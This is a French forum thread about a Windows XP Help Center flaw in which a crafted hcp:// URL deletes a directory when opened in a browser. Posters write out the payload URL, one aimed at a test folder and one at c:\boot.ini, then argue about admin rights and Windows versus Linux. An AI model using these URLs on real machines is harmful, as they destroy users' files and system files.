j'allais pas attendre 4 jours...

Recherche :

Mot : Pseudo : Filtrer
Bas de page
Auteur	Sujet : j'allais pas attendre 4 jours...

Buchu

Une jolie faille de sécurité dans XP qui permet d'effacer un répertoire depuis une page web.

Ex: un répertoire c:\test. Tu mets un ou 2 fichiers bidons tu copies ce lien dans ton butineur préféré (putain même Mozilla se fait avoir)

hcp://system/DFS/uplddrvinfo.htm?file://c:\test\*
Et regarde le résultat.
J'en suis resté sur le cul !!!

Pour info : http://www.security.nnov.ru/search [...] docid=3370

Publicité

ze_cameleon

Open your mind

buchu a écrit a écrit :

Une jolie faille de sécurité dans XP qui permet d'effacer un répertoire depuis une page web.

Ex: un répertoire c:\test. Tu mets un ou 2 fichiers bidons tu copies ce lien dans ton butineur préféré (putain même Mozilla se fait avoir)

hcp://system/DFS/uplddrvinfo.htm?file://c:\test\*
Et regarde le résultat.
J'en suis resté sur le cul !!!

Pour info : http://www.security.nnov.ru/search [...] docid=3370

ca prend pas en compte les droits ?

---------------
"Every solution breeds new problems"

kadreg

profil: Utilisateur

ze_cameleon a écrit a écrit :

ca prend pas en compte les droits ?

Sous win, tout le monde se logge en admin ou avec un user du groupe admin.

Scripting.FileSystemObject est une classe de merde, qui ne devrais pas exister.

---------------
brisez les rêves des gens, il en restera toujours quelque chose... -- laissez moi troller sur discu !

CHubaca

Couillon

XP cai de la merde, je l'ai toujours dit :jap:

Jak

Back to Slack !

C'est dans S&R qu'il faut aller poster ça. Là-bas, c'est troll tous les jours, non ?

PinG

Rooteur

Chubaca a écrit a écrit :

XP cai de la merde, je l'ai toujours dit :jap:

Windows c'est de la merde, je l'ai toujours dit :jap:

---------------
-- NO SLACKERS - violators will be fsck'd & tar'd

djoh

mais s'il est en admin le gars, il a aucun risque si ?

---------------
http://membres.lycos.fr/djohdjoh http://www.enduring-freedoms.org/sommaire.php3

kadreg

profil: Utilisateur

djoh a écrit a écrit :

mais s'il est en admin le gars, il a aucun risque si ?

hcp://system/DFS/uplddrvinfo.htm?file://c:\boot.ini

---------------
brisez les rêves des gens, il en restera toujours quelque chose... -- laissez moi troller sur discu !

djoh

kadreg a écrit a écrit :

hcp://system/DFS/uplddrvinfo.htm?file://c:\boot.ini

bourdail !
s'il est pas en admin je voulais dire :ange:

---------------
http://membres.lycos.fr/djohdjoh http://www.enduring-freedoms.org/sommaire.php3

cassidy

Black Rainbow

http://www.linux-mons.be/modules.p [...] =0&thold=0

:lol:

Publicité

Martinez

XP sux je le dis depuis des decennies !

djoh

djoh a écrit a écrit :

bourdail !
s'il est pas en admin je voulais dire :ange:

---------------
http://membres.lycos.fr/djohdjoh http://www.enduring-freedoms.org/sommaire.php3

djoh

djoh a écrit a écrit :

bourdail !
s'il est pas en admin je voulais dire :ange:

---------------
http://membres.lycos.fr/djohdjoh http://www.enduring-freedoms.org/sommaire.php3

djoh

djoh a écrit a écrit :

bourdail !
s'il est pas en admin je voulais dire :ange:

---------------
http://membres.lycos.fr/djohdjoh http://www.enduring-freedoms.org/sommaire.php3

kadreg

profil: Utilisateur

djoh a écrit a écrit :

Alors, on flood ?

[:webcop]

---------------
brisez les rêves des gens, il en restera toujours quelque chose... -- laissez moi troller sur discu !

djoh

kadreg a écrit a écrit :

Alors, on flood ?

[:webcop]

bah ouai ça répond pas
je précise que si qq'un se log en root sous nux, c'est le même toppo, donc windows c'est pourri, mais faut pas exagérer et comparer ce qui est comparable
sinon on est pas crédible face au enteter de windowsiens

---------------
http://membres.lycos.fr/djohdjoh http://www.enduring-freedoms.org/sommaire.php3

Jak

Back to Slack !

djoh a écrit a écrit :

bah ouai ça répond pas

je précise que si qq'un se log en root sous nux, c'est le même toppo, donc windows c'est pourri, mais faut pas exagérer et comparer ce qui est comparable

sinon on est pas crédible face au enteter de windowsiens

Sauf que le Windowsien de base trouve stupide d'avoir un compte avec des droits limités quand c'est sa propre machine.
Et puis sous Windows XP Maison Édition, un utilisateur avec compte limité a quand même le droit d'écrire dans /Program Files (et effacer aussi, il me semble, je revérifierai). Donc bon ...

djoh

Jak a écrit a écrit :

Sauf que le Windowsien de base trouve stupide d'avoir un compte avec des droits limités quand c'est sa propre machine.
Et puis sous Windows XP Maison Édition, un utilisateur avec compte limité a quand même le droit d'écrire dans /Program Files (et effacer aussi, il me semble, je revérifierai). Donc bon ...

pour program files c'est à vérifier, mais si le windowsien de base, qui n'est en fait qu'un user de base, ne veut pas se faire chier avec un compte admin, on peut pas en vouloir à windows (j'ai déjà vu des cremes qui faisait tout en root sous linux)

---------------
http://membres.lycos.fr/djohdjoh http://www.enduring-freedoms.org/sommaire.php3

asphro

FRANCHEMENT JE VOIS PAS PKOI CE TOPIC EST ICI !!!

un modo ne pourrait po le foutre ailleurs ?

c po une décharge OSA, quand même ?

FORUM HardWare.fr

Linux et OS Alternatifs

j'allais pas attendre 4 jours...

Sujets relatifs
[Gentoo] 1.2, 1.4_beta ou attendre la 1.4?	pq mon httpd il redémarre tous les jours à 4H du mat' ?? (résolu)
ssh: ne pas attendre la fin d'une commande	Je cherche des links à jours qui expliquent comment :
Plus de sujets relatifs à : j'allais pas attendre 4 jours...

Page générée en 0.033 secondes